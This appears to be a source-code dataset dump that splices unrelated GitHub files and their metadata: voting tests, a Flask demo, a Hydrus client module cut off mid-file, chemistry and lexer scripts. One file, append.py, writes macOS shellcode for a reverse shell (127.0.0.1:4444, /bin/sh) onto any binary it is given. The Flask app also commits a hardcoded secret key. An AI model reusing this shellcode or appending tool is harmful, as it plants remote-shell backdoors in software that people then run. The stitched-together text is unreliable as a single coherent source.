n_cands = election.shape[1] winner = borda(election, tiebreaker) assert isinstance(winner, int) assert winner in range(n_cands) @given(election=complete_ranked_ballots(min_cands=1, max_cands=25, min_voters=1, max_voters=100)) def test_legit_winner_none(election): election = np.asarray(election) n_cands = election.shape[1] winner = borda(election) assert isinstance(winner, (int, type(None))) assert winner in set(range(n_cands)) | {None} if __name__ == "__main__": # Run unit tests, in separate process to avoid warnings about cached # modules, printing output line by line in realtime from subprocess import Popen, PIPE with Popen(['pytest', '--tb=short', # shorter traceback format '--hypothesis-show-statistics', str(__file__)], stdout=PIPE, bufsize=1, universal_newlines=True) as p: for line in p.stdout: print(line, end='')
[ "endolith@gmail.com" ]
endolith@gmail.com
e3743e1a7d36b624dccc6c3714f1ee5d6660e740
d832b1ed2bcef2d7d644e5cc5eb333bc23193ce2
/23.2/sqla-associations-demo/VideoDemo/app.py
14b63a7edef5d6a715501c0a529a9c47e964ddbe
[]
no_license
sourcery-ai-bot/23_SQL_Alchemy
90df2be5ddafda7e5d5eb6eed967fb9aedeb3787
85114607c52d2fc1804aa6f3723d81ae14836852
refs/heads/main
2023-07-12T22:40:50.406064
2021-08-30T23:39:58
2021-08-30T23:39:58
null
0
0
null
null
null
null
UTF-8
Python
false
false
834
py
from flask import Flask, request, render_template, redirect, flash, session from flask_debugtoolbar import DebugToolbarExtension from models import db, connect_db, Department, Employee, get_directory, get_directory_join, get_directory_join_class, get_directory_all_join, Project, EmployeeProject app = Flask(__name__) app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///employees_db' app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False app.config['SQLALCHEMY_ECHO'] = True app.config['SECRET_KEY'] = "chickenzarecool21837" app.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False debug = DebugToolbarExtension(app) connect_db(app) @app.route('/phones') def list_phones(): """Renders directory of employees and phone numbers (from dept)""" emps = Employee.query.all() return render_template('phones.html', emps=emps)
[ "52443523+XuXaO415@users.noreply.github" ]
52443523+XuXaO415@users.noreply.github
b31675e7258797f946bd870777c6b7467a9630a9
b8a116bb0702abaa490d0985f2338e4951787402
/append.py
e9d0ae8028ae4a19950d14429c59dd040f01ac3e
[]
no_license
secretsquirrel/Shmoocon2016
322c1b70c42832090ff2c39569d2b5229e58f8c3
b2355ba8695fdbcb83694963668090ee9350bba6
refs/heads/master
2021-01-10T04:15:11.683365
2016-01-18T17:24:56
2016-01-18T17:24:56
49,734,627
27
5
null
null
null
null
UTF-8
Python
false
false
1,218
py
import struct import sys def append(a_file): with open(a_file, 'a') as f: egg_hunter = "\x77\x00\x00\x74\x77\x00\x00\x74" payload = ("\x55\x48\x89\xe5\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x04\x4c" "\x89\xc0\x48\x31\xff\x66\xbf\x01\x00\xeb\x1e\x5e\x48\x31\xd2\xb2" "\x0e\x0f\x05\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x01\x4c\x89" "\xc0\x31\xff\x0f\x05\x48\x89\xec\x5d\xe8\xdd\xff\xff\xff\x48\x65" "\x6c\x6c\x6f\x2c\x20\x57\x6f\x72\x6c\x64\x21\x0a") #127.0.0.1 port 4444 payload = ("\xb8\x61\x00\x00\x02\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f" "\x05\x49\x89\xc4\x48\x89\xc7\xb8\x62\x00\x00\x02\x48\x31\xf6" "\x56\x48\xbe\x00\x02\x11\x5c\x7f\x00\x00\x01\x56\x48\x89\xe6" "\x6a\x10\x5a\x0f\x05\x4c\x89\xe7\xb8\x5a\x00\x00\x02\x48\x31" "\xf6\x0f\x05\xb8\x5a\x00\x00\x02\x48\xff\xc6\x0f\x05\x48\x31" "\xc0\xb8\x3b\x00\x00\x02\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e" "\x2f\x73\x68\x00\x48\x8b\x3c\x24\x48\x31\xd2\x52\x57\x48\x89" "\xe6\x0f\x05") f.write(egg_hunter) f.write(struct.pack('>H', len(payload))) f.write(payload) if __name__ == "__main__": try: append(sys.argv[1]) except: print "Usage:", str(sys.argv[0]) + " binary"
[ "jhpitts@gmail.com" ]
jhpitts@gmail.com
7e2e0c0ba6b7e5a0e6a79bdeb31c25501d57b876
9d656910d4e22b4e1bfc136689cc8d5cf02b6619
/1write_bitzp_and_shuffle.py
0f7512516d7c7ab6d479e166c15ef73fd8bbe295
[ "MIT" ]
permissive
daishaoxing/cytotoxicity
ee8227d4d4700d798f1a61cdc18971a32e7ab55f
74f67b5a0d8e1b06981962a652e2e048634f8b4c
refs/heads/master
2021-08-20T08:46:50.664188
2017-09-19T09:45:44
2017-09-19T09:45:44
104,055,809
1
0
null
2017-11-28T16:50:37
2017-09-19T09:36:49
Python
UTF-8
Python
false
false
1,913
py
from sklearn.externals import joblib import pybel import cPickle import random def setOfWords2Vec(vocabList, inputSet): returnVec = [0]*len(vocabList) for word in inputSet: if word in vocabList: returnVec[vocabList.index(word)] = 1 else: print "the word: %s is not in my Vocabulary!" % word return returnVec def get_bits(f1): mols = list(pybel.readfile("smi",f1)); titles = [x.title for x in mols] bits = [x.calcfp().bits for x in mols] return bits,titles def numtostringlist(inlist): list1=[] for i in inlist: a=str(i) list1.append(a) return list1 activebits,activetitles=get_bits('cytotoxicity_active_final.smi') ##### f1=open('cytotoxicity_inactive_final.smi','r') f2=open('cytotoxicity_inactive_final_select.smi','w') aa=f1.readlines() random_inactive=random.sample(aa, len(activebits)) f2.write(''.join(random_inactive)) f1.close() f2.close() #### inactivebits,inactivetitles=get_bits('cytotoxicity_inactive_final_select.smi') print len(activebits) print len(inactivebits) fingerprint=range(1,1025) alldata=[] alldatalabel=[] for i in activebits: returnVec=setOfWords2Vec(fingerprint,i) list1=numtostringlist(returnVec) alldata.append(returnVec) alldatalabel.append(1) ### for i in inactivebits: returnVec=setOfWords2Vec(fingerprint,i) list1=numtostringlist(returnVec) alldata.append(returnVec) alldatalabel.append(0) data_and_label=[] for i in range(len(alldata)): a=[alldata[i],alldatalabel[i]] data_and_label.append(a) alldata=[] alldatalabel=[] random.shuffle(data_and_label) for i in range(len(data_and_label)): alldata.append(data_and_label[i][0]) alldatalabel.append(data_and_label[i][1]) #cPickle.dump(alldata,open("alldata.pkl","wb"))#data = cPickle.load(open("alldata.pkl","rb")) #cPickle.dump(alldatalabel,open("alldatalabel.pkl","wb")) joblib.dump(alldata,'alldata.pkl.z') #data = joblib.load('alldata.pkl.z') joblib.dump(alldatalabel,'alldatalabel.pkl.z')
[ "noreply@github.com" ]
daishaoxing.noreply@github.com
5502bfd4c0c120b2cdd499f18d9f837fa7b5bdf7
d4fc75c97ba5735c192e8d30ce427a4a7f8c2089
/lab4/main.py
f79821173f0eb494fa7dab61eb83180463a7b5d8
[]
no_license
aluminium13/sp2
20c0eb7d41dffb7acd956dfaef821a87dc2ad41a
f16452e2317e9b45ac7fe3016e9487fcd56bc997
refs/heads/master
2020-03-28T09:35:43.204198
2019-02-26T19:46:27
2019-02-26T19:46:27
148,045,295
0
0
null
null
null
null
UTF-8
Python
false
false
483
py
from pascal import pascal_lex from lex import hasNoErrors from syntax import syntax_analysis # while (n>0 and b=a[n]) do n:=n-1 # if c!=0 then b:=d else b:=2*a[n]; # b:= d!=0; b:=2*a[n]; # b:= d; b:=2*a[n]; characters = "" while characters != "q": characters = input(">") tokens = pascal_lex(characters) if hasNoErrors(tokens): syntax_analysis(tokens) """ for token in tokens: print(token[0] + " "*(7 - len(token[0])) + "| " + token[1]) """
[ "aluminium_71@outlook.com" ]
aluminium_71@outlook.com
eedf52d39db0f7cbd35b1da68b6f88b87aa7ab17
4aed67820732a4f421749b87cfecb652a5dd6a39
/homework5/homework5/predictors/__init__.py
3c3624420450332930a1ef5ea0d4c0f304e28e2e
[]
no_license
501Good/LTAT.01.001-Natural-language-processing-2018-19-spring
4e9c0845963be13284ec880ad9a630ee35154930
1d42e2a3b64086ce5651bc8c98edeb64ec64bc0d
refs/heads/master
2020-05-09T13:18:07.652688
2019-05-10T07:00:22
2019-05-10T07:00:22
181,145,901
0
0
null
null
null
null
UTF-8
Python
false
false
71
py
from homework5.predictors.predictors import SentenceClassifierPredictor
[ "milintsevich@gmail.com" ]
milintsevich@gmail.com
65e39f05502ee1e4f16aa0274c7f28f5ee17a0e9
bf2390ac5b116177acebd424707167c5c22d081a
/include/ClientData.py
e10c43a7a89c916e059cfdba2a21e69ac7991739
[ "WTFPL" ]
permissive
bigretromike/hydrus
1cd842129da3e1851a7ad0559790a4895cad6887
6da58bc9df51c75fa65173b182166deb3259278e
refs/heads/master
2021-01-24T20:25:24.164062
2015-11-13T09:06:38
2015-11-13T09:06:38
44,671,599
0
0
null
2015-11-13T09:06:38
2015-10-21T11:26:12
Python
UTF-8
Python
false
false
110,042
py
import ClientConstants as CC import ClientDefaults import ClientDownloading import ClientFiles import ClientNetworking import collections import datetime import HydrusConstants as HC import HydrusExceptions import HydrusSerialisable import HydrusTags import threading import traceback import os import random import shutil import sqlite3 import stat import sys import time import wx import yaml import HydrusData import HydrusGlobals import HydrusThreading def AddPaddingToDimensions( dimensions, padding ): ( x, y ) = dimensions return ( x + padding, y + padding ) def CatchExceptionClient( etype, value, tb ): try: job_key = HydrusThreading.JobKey() if etype == HydrusExceptions.ShutdownException: return elif etype == HydrusExceptions.DBException: ( text, caller_traceback, db_traceback ) = value job_key.SetVariable( 'popup_title', 'Database Error!' ) job_key.SetVariable( 'popup_text_1', text ) job_key.SetVariable( 'popup_caller_traceback', caller_traceback ) job_key.SetVariable( 'popup_db_traceback', db_traceback ) else: trace_list = traceback.format_tb( tb ) trace = ''.join( trace_list ) if etype == wx.PyDeadObjectError: print( 'Got a PyDeadObjectError, which can probably be ignored, but here it is anyway:' ) print( HydrusData.ToUnicode( value ) ) print( trace ) return try: job_key.SetVariable( 'popup_title', HydrusData.ToUnicode( etype.__name__ ) ) except: job_key.SetVariable( 'popup_title', HydrusData.ToUnicode( etype ) ) job_key.SetVariable( 'popup_text_1', HydrusData.ToUnicode( value ) ) job_key.SetVariable( 'popup_traceback', trace ) text = job_key.ToString() print( '' ) print( 'The following uncaught exception occured at ' + HydrusData.ConvertTimestampToPrettyTime( HydrusData.GetNow() ) + ':' ) try: print( text ) except: print( repr( text ) ) sys.stdout.flush() sys.stderr.flush() HydrusGlobals.client_controller.pub( 'message', job_key ) except: text = 'Encountered an error I could not parse:' text += os.linesep text += HydrusData.ToUnicode( ( etype, value, tb ) ) try: text += traceback.format_exc() except: pass HydrusData.ShowText( text ) time.sleep( 1 ) def ConvertServiceKeysToContentUpdatesToPrettyString( service_keys_to_content_updates ): num_files = 0 actions = set() locations = set() extra_words = '' for ( service_key, content_updates ) in service_keys_to_content_updates.items(): if len( content_updates ) > 0: name = HydrusGlobals.client_controller.GetServicesManager().GetService( service_key ).GetName() locations.add( name ) for content_update in content_updates: ( data_type, action, row ) = content_update.ToTuple() if data_type == HC.CONTENT_TYPE_MAPPINGS: extra_words = ' tags for' actions.add( HC.content_update_string_lookup[ action ] ) num_files += len( content_update.GetHashes() ) s = ', '.join( locations ) + '->' + ', '.join( actions ) + extra_words + ' ' + HydrusData.ConvertIntToPrettyString( num_files ) + ' files' return s def ConvertServiceKeysToTagsToServiceKeysToContentUpdates( hashes, service_keys_to_tags ): service_keys_to_content_updates = {} for ( service_key, tags ) in service_keys_to_tags.items(): if service_key == CC.LOCAL_TAG_SERVICE_KEY: action = HC.CONTENT_UPDATE_ADD else: action = HC.CONTENT_UPDATE_PEND content_updates = [ HydrusData.ContentUpdate( HC.CONTENT_TYPE_MAPPINGS, action, ( tag, hashes ) ) for tag in tags ] service_keys_to_content_updates[ service_key ] = content_updates return service_keys_to_content_updates def ConvertShortcutToPrettyShortcut( modifier, key ): if modifier == wx.ACCEL_NORMAL: modifier = '' elif modifier == wx.ACCEL_ALT: modifier = 'alt' elif modifier == wx.ACCEL_CTRL: modifier = 'ctrl' elif modifier == wx.ACCEL_SHIFT: modifier = 'shift' if key in range( 65, 91 ): key = chr( key + 32 ) # + 32 for converting ascii A -> a elif key in range( 97, 123 ): key = chr( key ) else: key = CC.wxk_code_string_lookup[ key ] return ( modifier, key ) def ConvertZoomToPercentage( zoom ): zoom_percent = zoom * 100 if zoom in CC.ZOOMS: pretty_zoom = '%i' % zoom_percent + '%' else: pretty_zoom = '%.2f' % zoom_percent + '%' return pretty_zoom def DeletePath( path ): if HC.options[ 'delete_to_recycle_bin' ] == True: HydrusData.RecyclePath( path ) else: HydrusData.DeletePath( path ) def GetMediasTagCount( pool, tag_service_key = CC.COMBINED_TAG_SERVICE_KEY, collapse_siblings = False ): siblings_manager = HydrusGlobals.client_controller.GetManager( 'tag_siblings' ) tags_managers = [] for media in pool: if media.IsCollection(): tags_managers.extend( media.GetSingletonsTagsManagers() ) else: tags_managers.append( media.GetTagsManager() ) current_tags_to_count = collections.Counter() deleted_tags_to_count = collections.Counter() pending_tags_to_count = collections.Counter() petitioned_tags_to_count = collections.Counter() for tags_manager in tags_managers: statuses_to_tags = tags_manager.GetStatusesToTags( tag_service_key ) if collapse_siblings: statuses_to_tags = siblings_manager.CollapseStatusesToTags( statuses_to_tags ) current_tags_to_count.update( statuses_to_tags[ HC.CURRENT ] ) deleted_tags_to_count.update( statuses_to_tags[ HC.DELETED ] ) pending_tags_to_count.update( statuses_to_tags[ HC.PENDING ] ) petitioned_tags_to_count.update( statuses_to_tags[ HC.PETITIONED ] ) return ( current_tags_to_count, deleted_tags_to_count, pending_tags_to_count, petitioned_tags_to_count ) def ShowExceptionClient( e ): job_key = HydrusThreading.JobKey() if isinstance( e, HydrusExceptions.ShutdownException ): return elif isinstance( e, HydrusExceptions.DBException ): ( text, caller_traceback, db_traceback ) = e.args job_key.SetVariable( 'popup_title', 'Database Error!' ) job_key.SetVariable( 'popup_text_1', text ) job_key.SetVariable( 'popup_caller_traceback', caller_traceback ) job_key.SetVariable( 'popup_db_traceback', db_traceback ) else: ( etype, value, tb ) = sys.exc_info() if etype is None: etype = type( e ) value = HydrusData.ToUnicode( e ) trace = ''.join( traceback.format_stack() ) else: trace = ''.join( traceback.format_exception( etype, value, tb ) ) if etype == wx.PyDeadObjectError: print( 'Got a PyDeadObjectError, which can probably be ignored, but here it is anyway:' ) print( HydrusData.ToUnicode( value ) ) print( trace ) return if hasattr( etype, '__name__' ): title = HydrusData.ToUnicode( etype.__name__ ) else: title = HydrusData.ToUnicode( etype ) job_key.SetVariable( 'popup_title', title ) job_key.SetVariable( 'popup_text_1', HydrusData.ToUnicode( value ) ) job_key.SetVariable( 'popup_traceback', trace ) text = job_key.ToString() print( '' ) print( 'The following exception occured at ' + HydrusData.ConvertTimestampToPrettyTime( HydrusData.GetNow() ) + ':' ) try: print( text ) except: print( repr( text ) ) sys.stdout.flush() sys.stderr.flush() HydrusGlobals.client_controller.pub( 'message', job_key ) time.sleep( 1 ) def ShowTextClient( text ): job_key = HydrusThreading.JobKey() job_key.SetVariable( 'popup_text_1', HydrusData.ToUnicode( text ) ) text = job_key.ToString() try: print( text ) except: print( repr( text ) ) HydrusGlobals.client_controller.pub( 'message', job_key ) class Booru( HydrusData.HydrusYAMLBase ): yaml_tag = u'!Booru' def __init__( self, name, search_url, search_separator, advance_by_page_num, thumb_classname, image_id, image_data, tag_classnames_to_namespaces ): self._name = name self._search_url = search_url self._search_separator = search_separator self._advance_by_page_num = advance_by_page_num self._thumb_classname = thumb_classname self._image_id = image_id self._image_data = image_data self._tag_classnames_to_namespaces = tag_classnames_to_namespaces def GetData( self ): return ( self._search_url, self._search_separator, self._advance_by_page_num, self._thumb_classname, self._image_id, self._image_data, self._tag_classnames_to_namespaces ) def GetGalleryParsingInfo( self ): return ( self._search_url, self._advance_by_page_num, self._search_separator, self._thumb_classname ) def GetName( self ): return self._name def GetNamespaces( self ): return self._tag_classnames_to_namespaces.values() sqlite3.register_adapter( Booru, yaml.safe_dump ) class ClientOptions( HydrusSerialisable.SerialisableBase ): SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_CLIENT_OPTIONS SERIALISABLE_VERSION = 1 def __init__( self ): HydrusSerialisable.SerialisableBase.__init__( self ) self._dictionary = HydrusSerialisable.SerialisableDictionary() self._lock = threading.Lock() self._InitialiseDefaults() def _GetSerialisableInfo( self ): with self._lock: serialisable_info = self._dictionary.GetSerialisableTuple() return serialisable_info def _InitialiseDefaults( self ): self._dictionary[ 'default_import_tag_options' ] = HydrusSerialisable.SerialisableDictionary() def _InitialiseFromSerialisableInfo( self, serialisable_info ): self._dictionary = HydrusSerialisable.CreateFromSerialisableTuple( serialisable_info ) def ClearDefaultImportTagOptions( self ): with self._lock: self._dictionary[ 'default_import_tag_options' ] = HydrusSerialisable.SerialisableDictionary() def GetDefaultImportTagOptions( self, gallery_identifier = None ): with self._lock: default_import_tag_options = self._dictionary[ 'default_import_tag_options' ] if gallery_identifier is None: return default_import_tag_options else: if gallery_identifier in default_import_tag_options: import_tag_options = default_import_tag_options[ gallery_identifier ] else: default_booru_gallery_identifier = ClientDownloading.GalleryIdentifier( HC.SITE_TYPE_BOORU ) default_hentai_foundry_gallery_identifier = ClientDownloading.GalleryIdentifier( HC.SITE_TYPE_HENTAI_FOUNDRY ) default_pixiv_gallery_identifier = ClientDownloading.GalleryIdentifier( HC.SITE_TYPE_PIXIV ) default_gallery_identifier = ClientDownloading.GalleryIdentifier( HC.SITE_TYPE_DEFAULT ) guidance_import_tag_options = None site_type = gallery_identifier.GetSiteType() if site_type == HC.SITE_TYPE_BOORU and default_booru_gallery_identifier in default_import_tag_options: guidance_import_tag_options = default_import_tag_options[ default_booru_gallery_identifier ] elif site_type in ( HC.SITE_TYPE_HENTAI_FOUNDRY_ARTIST, HC.SITE_TYPE_HENTAI_FOUNDRY_TAGS ) and default_hentai_foundry_gallery_identifier in default_import_tag_options: guidance_import_tag_options = default_import_tag_options[ default_hentai_foundry_gallery_identifier ] elif site_type in ( HC.SITE_TYPE_PIXIV_ARTIST_ID, HC.SITE_TYPE_PIXIV_TAG ) and default_pixiv_gallery_identifier in default_import_tag_options: guidance_import_tag_options = default_import_tag_options[ default_pixiv_gallery_identifier ] elif default_gallery_identifier in default_import_tag_options: guidance_import_tag_options = default_import_tag_options[ default_gallery_identifier ] service_keys_to_namespaces = {} service_keys_to_explicit_tags = {} if guidance_import_tag_options is not None: ( namespaces, search_value ) = ClientDefaults.GetDefaultNamespacesAndSearchValue( gallery_identifier ) guidance_service_keys_to_namespaces = guidance_import_tag_options.GetServiceKeysToNamespaces() for ( service_key, guidance_namespaces ) in guidance_service_keys_to_namespaces.items(): if 'all namespaces' in guidance_namespaces: service_keys_to_namespaces[ service_key ] = namespaces else: service_keys_to_namespaces[ service_key ] = [ namespace for namespace in namespaces if namespace in guidance_namespaces ] service_keys_to_explicit_tags = guidance_import_tag_options.GetServiceKeysToExplicitTags() import_tag_options = ImportTagOptions( service_keys_to_namespaces = service_keys_to_namespaces, service_keys_to_explicit_tags = service_keys_to_explicit_tags ) return import_tag_options def SetDefaultImportTagOptions( self, gallery_identifier, import_tag_options ): with self._lock: self._dictionary[ 'default_import_tag_options' ][ gallery_identifier ] = import_tag_options HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_CLIENT_OPTIONS ] = ClientOptions class Credentials( HydrusData.HydrusYAMLBase ): yaml_tag = u'!Credentials' def __init__( self, host, port, access_key = None ): HydrusData.HydrusYAMLBase.__init__( self ) if host == 'localhost': host = '127.0.0.1' self._host = host self._port = port self._access_key = access_key def __eq__( self, other ): return self.__hash__() == other.__hash__() def __hash__( self ): return ( self._host, self._port, self._access_key ).__hash__() def __ne__( self, other ): return self.__hash__() != other.__hash__() def __repr__( self ): return 'Credentials: ' + HydrusData.ToUnicode( ( self._host, self._port, self._access_key.encode( 'hex' ) ) ) def GetAccessKey( self ): return self._access_key def GetAddress( self ): return ( self._host, self._port ) def GetConnectionString( self ): connection_string = '' if self.HasAccessKey(): connection_string += self._access_key.encode( 'hex' ) + '@' connection_string += self._host + ':' + str( self._port ) return connection_string def HasAccessKey( self ): return self._access_key is not None and self._access_key is not '' def SetAccessKey( self, access_key ): self._access_key = access_key class FileQueryResult( object ): def __init__( self, media_results ): self._hashes_to_media_results = { media_result.GetHash() : media_result for media_result in media_results } self._hashes_ordered = [ media_result.GetHash() for media_result in media_results ] self._hashes = set( self._hashes_ordered ) HydrusGlobals.client_controller.sub( self, 'ProcessContentUpdates', 'content_updates_data' ) HydrusGlobals.client_controller.sub( self, 'ProcessServiceUpdates', 'service_updates_data' ) def __iter__( self ): for hash in self._hashes_ordered: yield self._hashes_to_media_results[ hash ] def __len__( self ): return len( self._hashes_ordered ) def _Remove( self, hashes ): for hash in hashes: if hash in self._hashes_to_media_results: del self._hashes_to_media_results[ hash ] self._hashes_ordered.remove( hash ) self._hashes.difference_update( hashes ) def AddMediaResults( self, media_results ): for media_result in media_results: hash = media_result.GetHash() if hash in self._hashes: continue # this is actually important, as sometimes we don't want the media result overwritten self._hashes_to_media_results[ hash ] = media_result self._hashes_ordered.append( hash ) self._hashes.add( hash ) def GetHashes( self ): return self._hashes def GetMediaResult( self, hash ): return self._hashes_to_media_results[ hash ] def GetMediaResults( self ): return [ self._hashes_to_media_results[ hash ] for hash in self._hashes_ordered ] def ProcessContentUpdates( self, service_keys_to_content_updates ): for ( service_key, content_updates ) in service_keys_to_content_updates.items(): for content_update in content_updates: hashes = content_update.GetHashes() if len( hashes ) > 0: for hash in self._hashes.intersection( hashes ): media_result = self._hashes_to_media_results[ hash ] media_result.ProcessContentUpdate( service_key, content_update ) def ProcessServiceUpdates( self, service_keys_to_service_updates ): for ( service_key, service_updates ) in service_keys_to_service_updates.items(): for service_update in service_updates: ( action, row ) = service_update.ToTuple() if action == HC.SERVICE_UPDATE_DELETE_PENDING: for media_result in self._hashes_to_media_results.values(): media_result.DeletePending( service_key ) elif action == HC.SERVICE_UPDATE_RESET: for media_result in self._hashes_to_media_results.values(): media_result.ResetService( service_key ) class FileSearchContext( HydrusSerialisable.SerialisableBase ): SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_FILE_SEARCH_CONTEXT SERIALISABLE_VERSION = 1 def __init__( self, file_service_key = CC.COMBINED_FILE_SERVICE_KEY, tag_service_key = CC.COMBINED_TAG_SERVICE_KEY, include_current_tags = True, include_pending_tags = True, predicates = None ): if predicates is None: predicates = [] self._file_service_key = file_service_key self._tag_service_key = tag_service_key self._include_current_tags = include_current_tags self._include_pending_tags = include_pending_tags self._predicates = predicates self._search_complete = False self._InitialiseTemporaryVariables() def _GetSerialisableInfo( self ): serialisable_predicates = [ predicate.GetSerialisableTuple() for predicate in self._predicates ] return ( self._file_service_key.encode( 'hex' ), self._tag_service_key.encode( 'hex' ), self._include_current_tags, self._include_pending_tags, serialisable_predicates, self._search_complete ) def _InitialiseFromSerialisableInfo( self, serialisable_info ): ( file_service_key, tag_service_key, self._include_current_tags, self._include_pending_tags, serialisable_predicates, self._search_complete ) = serialisable_info self._file_service_key = file_service_key.decode( 'hex' ) self._tag_service_key = tag_service_key.decode( 'hex' ) self._predicates = [ HydrusSerialisable.CreateFromSerialisableTuple( pred_tuple ) for pred_tuple in serialisable_predicates ] self._InitialiseTemporaryVariables() def _InitialiseTemporaryVariables( self ): system_predicates = [ predicate for predicate in self._predicates if predicate.GetType() in HC.SYSTEM_PREDICATES ] self._system_predicates = FileSystemPredicates( system_predicates ) tag_predicates = [ predicate for predicate in self._predicates if predicate.GetType() == HC.PREDICATE_TYPE_TAG ] self._tags_to_include = [] self._tags_to_exclude = [] for predicate in tag_predicates: tag = predicate.GetValue() if predicate.GetInclusive(): self._tags_to_include.append( tag ) else: self._tags_to_exclude.append( tag ) namespace_predicates = [ predicate for predicate in self._predicates if predicate.GetType() == HC.PREDICATE_TYPE_NAMESPACE ] self._namespaces_to_include = [] self._namespaces_to_exclude = [] for predicate in namespace_predicates: namespace = predicate.GetValue() if predicate.GetInclusive(): self._namespaces_to_include.append( namespace ) else: self._namespaces_to_exclude.append( namespace ) wildcard_predicates = [ predicate for predicate in self._predicates if predicate.GetType() == HC.PREDICATE_TYPE_WILDCARD ] self._wildcards_to_include = [] self._wildcards_to_exclude = [] for predicate in wildcard_predicates: wildcard = predicate.GetValue() if predicate.GetInclusive(): self._wildcards_to_include.append( wildcard ) else: self._wildcards_to_exclude.append( wildcard ) def GetFileServiceKey( self ): return self._file_service_key def GetNamespacesToExclude( self ): return self._namespaces_to_exclude def GetNamespacesToInclude( self ): return self._namespaces_to_include def GetPredicates( self ): return self._predicates def GetSystemPredicates( self ): return self._system_predicates def GetTagServiceKey( self ): return self._tag_service_key def GetTagsToExclude( self ): return self._tags_to_exclude def GetTagsToInclude( self ): return self._tags_to_include def GetWildcardsToExclude( self ): return self._wildcards_to_exclude def GetWildcardsToInclude( self ): return self._wildcards_to_include def IncludeCurrentTags( self ): return self._include_current_tags def IncludePendingTags( self ): return self._include_pending_tags def IsComplete( self ): return self._search_complete def SetComplete( self ): self._search_complete = True def SetPredicates( self, predicates ): self._predicates = predicates self._InitialiseTemporaryVariables() HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_FILE_SEARCH_CONTEXT ] = FileSearchContext class FileSystemPredicates( object ): def __init__( self, system_predicates ): self._inbox = False self._archive = False self._local = False self._not_local = False self._common_info = {} self._limit = None self._similar_to = None self._file_services_to_include_current = [] self._file_services_to_include_pending = [] self._file_services_to_exclude_current = [] self._file_services_to_exclude_pending = [] self._ratings_predicates = [] for predicate in system_predicates: predicate_type = predicate.GetType() value = predicate.GetValue() if predicate_type == HC.PREDICATE_TYPE_SYSTEM_INBOX: self._inbox = True if predicate_type == HC.PREDICATE_TYPE_SYSTEM_ARCHIVE: self._archive = True if predicate_type == HC.PREDICATE_TYPE_SYSTEM_LOCAL: self._local = True if predicate_type == HC.PREDICATE_TYPE_SYSTEM_NOT_LOCAL: self._not_local = True if predicate_type == HC.PREDICATE_TYPE_SYSTEM_HASH: hash = value self._common_info[ 'hash' ] = hash if predicate_type == HC.PREDICATE_TYPE_SYSTEM_AGE: ( operator, years, months, days, hours ) = value age = ( ( ( ( ( ( ( years * 12 ) + months ) * 30 ) + days ) * 24 ) + hours ) * 3600 ) now = HydrusData.GetNow() # this is backwards because we are talking about age, not timestamp if operator == '<': self._common_info[ 'min_timestamp' ] = now - age elif operator == '>': self._common_info[ 'max_timestamp' ] = now - age elif operator == u'\u2248': self._common_info[ 'min_timestamp' ] = now - int( age * 1.15 ) self._common_info[ 'max_timestamp' ] = now - int( age * 0.85 ) if predicate_type == HC.PREDICATE_TYPE_SYSTEM_MIME: mimes = value if type( mimes ) == int: mimes = ( mimes, ) self._common_info[ 'mimes' ] = mimes if predicate_type == HC.PREDICATE_TYPE_SYSTEM_DURATION: ( operator, duration ) = value if operator == '<': self._common_info[ 'max_duration' ] = duration elif operator == '>': self._common_info[ 'min_duration' ] = duration elif operator == '=': self._common_info[ 'duration' ] = duration elif operator == u'\u2248': if duration == 0: self._common_info[ 'duration' ] = 0 else: self._common_info[ 'min_duration' ] = int( duration * 0.85 ) self._common_info[ 'max_duration' ] = int( duration * 1.15 ) if predicate_type == HC.PREDICATE_TYPE_SYSTEM_RATING: ( operator, value, service_key ) = value self._ratings_predicates.append( ( operator, value, service_key ) ) if predicate_type == HC.PREDICATE_TYPE_SYSTEM_RATIO: ( operator, ratio_width, ratio_height ) = value if operator == '=': self._common_info[ 'ratio' ] = ( ratio_width, ratio_height ) elif operator == u'\u2248': self._common_info[ 'min_ratio' ] = ( ratio_width * 0.85, ratio_height ) self._common_info[ 'max_ratio' ] = ( ratio_width * 1.15, ratio_height ) if predicate_type == HC.PREDICATE_TYPE_SYSTEM_SIZE: ( operator, size, unit ) = value size = size * unit if operator == '<': self._common_info[ 'max_size' ] = size elif operator == '>': self._common_info[ 'min_size' ] = size elif operator == '=': self._common_info[ 'size' ] = size elif operator == u'\u2248': self._common_info[ 'min_size' ] = int( size * 0.85 ) self._common_info[ 'max_size' ] = int( size * 1.15 ) if predicate_type == HC.PREDICATE_TYPE_SYSTEM_NUM_TAGS: ( operator, num_tags ) = value if operator == '<': self._common_info[ 'max_num_tags' ] = num_tags elif operator == '=': self._common_info[ 'num_tags' ] = num_tags elif operator == '>': self._common_info[ 'min_num_tags' ] = num_tags if predicate_type == HC.PREDICATE_TYPE_SYSTEM_WIDTH: ( operator, width ) = value if operator == '<': self._common_info[ 'max_width' ] = width elif operator == '>': self._common_info[ 'min_width' ] = width elif operator == '=': self._common_info[ 'width' ] = width elif operator == u'\u2248': if width == 0: self._common_info[ 'width' ] = 0 else: self._common_info[ 'min_width' ] = int( width * 0.85 ) self._common_info[ 'max_width' ] = int( width * 1.15 ) if predicate_type == HC.PREDICATE_TYPE_SYSTEM_NUM_PIXELS: ( operator, num_pixels, unit ) = value num_pixels = num_pixels * unit if operator == '<': self._common_info[ 'max_num_pixels' ] = num_pixels elif operator == '>': self._common_info[ 'min_num_pixels' ] = num_pixels elif operator == '=': self._common_info[ 'num_pixels' ] = num_pixels elif operator == u'\u2248': self._common_info[ 'min_num_pixels' ] = int( num_pixels * 0.85 ) self._common_info[ 'max_num_pixels' ] = int( num_pixels * 1.15 ) if predicate_type == HC.PREDICATE_TYPE_SYSTEM_HEIGHT: ( operator, height ) = value if operator == '<': self._common_info[ 'max_height' ] = height elif operator == '>': self._common_info[ 'min_height' ] = height elif operator == '=': self._common_info[ 'height' ] = height elif operator == u'\u2248': if height == 0: self._common_info[ 'height' ] = 0 else: self._common_info[ 